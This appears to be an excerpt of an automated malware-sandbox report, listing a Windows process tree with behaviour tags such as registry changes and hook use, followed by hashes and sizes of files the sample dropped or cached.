C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:13⤵PID:996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4548 /prefetch:13⤵PID:236
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3468
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3832
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3908
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4044
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4452
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1008
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4308
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2332
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
PID:4748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1380
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4944
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:3868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:240
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1724
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2932
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClippingHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\ScreenClippingHost.exe" -ServerName:ScreenClipping.AppX6726kd2wrry6c6n8nc57a1zn08dmzmbt.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2004
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CaptureService1⤵PID:4936
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca1⤵PID:2184
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2184 -s 9322⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2788
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4636 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 2184 -ip 21842⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2304
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3452
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2012
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:1604
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:3048
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:804
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:1272
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13KB
MD548223b707155423a8edc7e4b3d42af93
SHA19d5c65a4d422ef899d8874ac9b3a4b9a67cc69ef
SHA256457f918e8726062f32561e5e6482627b5fe16c5c9cf38057df9cb593f6dc95db
SHA512ffd84b8391c18c7dfd97b48973d317ee7252a591d0bb03dd14df5bbce14264fa2794fd1c784fc04efb67430efa76ba75d04ca57edff34a7cdf64f096ae431178
-
Filesize
36KB
MD5bb07422e64a9a9e636e64dfa3cc5740f
SHA1d78b59a243bb6e0954581a6804ec786df13b7f2a
SHA256431d2375b55a10ef206cc104ab7a35db6864a6000a50b69d6731db7303002f1d
SHA512c1a601f7e910fb310d75320ecd3c68419aa4c1eb7e8f6751ef80eb3e618d62208453bd537f7c2735cdd62658022b751ba83ce2eb2a5492994490a6a4eed43c8b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5d4e65813d7b8f8d34312fcd3c6f4a0f4
SHA12a53832fdd5e9b29190a0a8fae0fb0c75944c021
SHA2562ee66b84c98ae410d13287a9e814aa5518e8435de1d9206fc6be066df18bca50
SHA512eb517db854ca5ffc1faa6678da2be0b78c0da9fb94c3770a323cb53761fd2e36100671f266cd259d717f91f164362ceaefa92513cd9ecd9656c38a294dd64310
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize338B
MD5eb25d527fd708e9cccaa9e801ebd4708
SHA1c5b15ec7b0dbabe9f6d21e20eb1e7359f9fdeba9
SHA25602432cd21e6259cf9f1f3863cacdde7de11a8ad1c313296a4175f08e5dc7a392
SHA512d137e418065f1e61a1873ae7c89c2685d80b90bad90967567b86dfeb4e7ec1b80121ad5a8faa581ca22f66a8a4ec3842383b77e239de97ae7aa1b0c709dc382e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD529f281593c544200a5687bc89933d081
SHA10c661af2138755280e2dbad222c128ddc982871f
SHA2560f25c5bcc55fd3954235c2b6631a30ba5da459e261cf85743565c02bd2f0a469
SHA5125cddd0c9f32b8d3f40fcc921b513061627ea4294aa4fd017be67ed40c038c318f9822b58fcb9bcc9aa3b211a744f5e1e1fddcd9a4fbdf2237d8827a2f5018811
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Filesize330B
MD521bb3948fba8fb269f5bbb3a1a3a439e
SHA10c86ee44a6dd55ae0c6a03cf288b86c51628af16
SHA2566c34ee3e61653029f0c1165caa622c02c561465e5e5f2796744ec76bf7b18d6b
SHA512a8c857b369984eb7be57a1e3db51f5baac961832aa66b62f72b8cf0f8e167c763adb48fbff91b811a36ae46cfae3211bb8df15b7abd5721b46ccd4d8d6b55448
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
Filesize330B
MD5075de34db583b232155b45e76c9af5ae
SHA11b9c97711a79df60e8be79bbbbb6c18cdb94380c
SHA256f9eed2a35eba6db6ea4d47fae5a51a19d230e910f66b9f3ef93df075feda5242
SHA512f07857ddf704e05061d7f791b55938d438489908bb626b05f22bb8d41ce8e7066db423d6d85067a44ac6f5ee5dca7aa560b6751645e75f11efd3866afe0ea03c
-
Filesize
152B
MD5d0f84c55517d34a91f12cccf1d3af583
SHA152bd01e6ab1037d31106f8bf6e2552617c201cea
SHA2569a24c67c3ec89f5cf8810eba1fdefc7775044c71ed78a8eb51c8d2225ad1bc4c
SHA51294764fe7f6d8c182beec398fa8c3a1948d706ab63121b8c9f933eef50172c506a1fd015172b7b6bac898ecbfd33e00a4a0758b1c8f2f4534794c39f076cd6171
-
Filesize
152B
MD5ade01a8cdbbf61f66497f88012a684d1
SHA19ff2e8985d9a101a77c85b37c4ac9d4df2525a1f
SHA256f49e20af78caf0d737f6dbcfc5cc32701a35eb092b3f0ab24cf339604cb049b5
SHA512fa024bd58e63402b06503679a396b8b4b1bc67dc041d473785957f56f7d972317ec8560827c8008989d2754b90e23fc984a85ed7496f05cb4edc2d8000ae622b
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
5KB
MD52c2685676c3cbabead460d95cc0ff79b
SHA1ef5b4e68101738ddb5bd2d918ff1f66dfb01d6ac
SHA25618cab470e10acb05f25ba3f83c878a008791f8067e2025551ef3cff992c68a7d
SHA5121e67194e452adb9db004cd67d2820626718027c44feb37530f27908d2561a0f6d9444c833336072ab1e256d4902bf8fc084ed94ebd5ce56726e9ddfefc6aedf8
-
Filesize
5KB
MD50f38b83a7d5eb75a88c26186e1dc7517
SHA1ca73331f498669054e6fd53e4773fea11f1fd66d
SHA256d1c984a4bbd729c2cb81295d44598d965ca3517fdd0071e16b5d76f4b4d90476
SHA5125cd99108630507176b815c0ec2f7b35ff119a19203819c0303027dc2cf6f740feae119186b9547435f0c86d8699a916c929aeaf18648b23ee7461146e7794c68
-
Filesize
11KB
MD5f66e1fe4f9bbecd27e3c5497b76a7123
SHA1d72474f267cba1b535ccd6cbba94b6dea7976612
SHA25655ca07462b0b7618113a049edf80eaad6a408391679980370be1c9646e6e85b0
SHA51274c5e06d4be8431fd1d2e751c99de1555d783f683eb79e2666142d2fbac84e06c2d9126a1256e1404b1c4be2b48d2199e48bd90e89c14b8dfa80706fe8c6c8df
-
Filesize
262B
MD5d734f20f82253ab1468841929053bff0
SHA16a70b89384597435c7782d8eb66455782bd682cd
SHA2562021b992edf205a893a03231fe7a61e185f9ac161caef77b56ba71176345347e
SHA5127a612a7bcbc49db0d8bf0c7793f13a17c81e3f481b92d04a4ec0a1787582bcaa4080f11dae83863dd137c7fddd24710337ed2155091d41d3faeaf5cd26353a37
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
131KB
MD5bd65d387482def1fe00b50406f731763
SHA1d06a2ba2e29228f443f97d1dd3a8da5dd7df5903
SHA2561ab7375550516d7445c47fd9b551ed864f227401a14ff3f1ff0d70caca3bd997
SHA512351ecd109c4d49bc822e8ade73a9516c4a531ebcda63546c155e677dcff19708068dc588b2fcf30cad086238e8b206fc5f349d37dda02d3c3a8d9b570d92e4d9
-
Filesize
368B
MD56075322851f5d03ffaf349b60a30cf8e
SHA15889e7b4ee2d6673b844d372e7c98fa4c5690f49
SHA256167d407dcb952abd01ca4d891d6c5a8200bc8e82a4b71a5756f85199baf5887e
SHA512f09a388c267477b1edd1b90580157c4fa85042668cdefdc3f02965bfab0029652c5842d233fe0e84c62c3d29a5d7e27165cf0e44d94983948278b888a35d9f7b
-
Filesize
409KB
MD54c2bb0618a6eda615c8001d5a7ccd6c0
SHA1c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA5126abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
Filesize412B
MD59d1e669349f049f62c6c596e19e9a25a
SHA14f112e61d8e788914f44e80d943f3b4f8eaeeaa8
SHA2567520aa7f501102b7dc41885247acc376bf5859600183e4820cb8b9c8627e8b4e
SHA512865fec8e4b55e273708216e40b7bd6e5a68dd3ce0dfc2f1811ee96c266f4f5d4c6311ea677fcd8314ff730d4947e10c020d7d1222681267cfb70d401bc44795c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b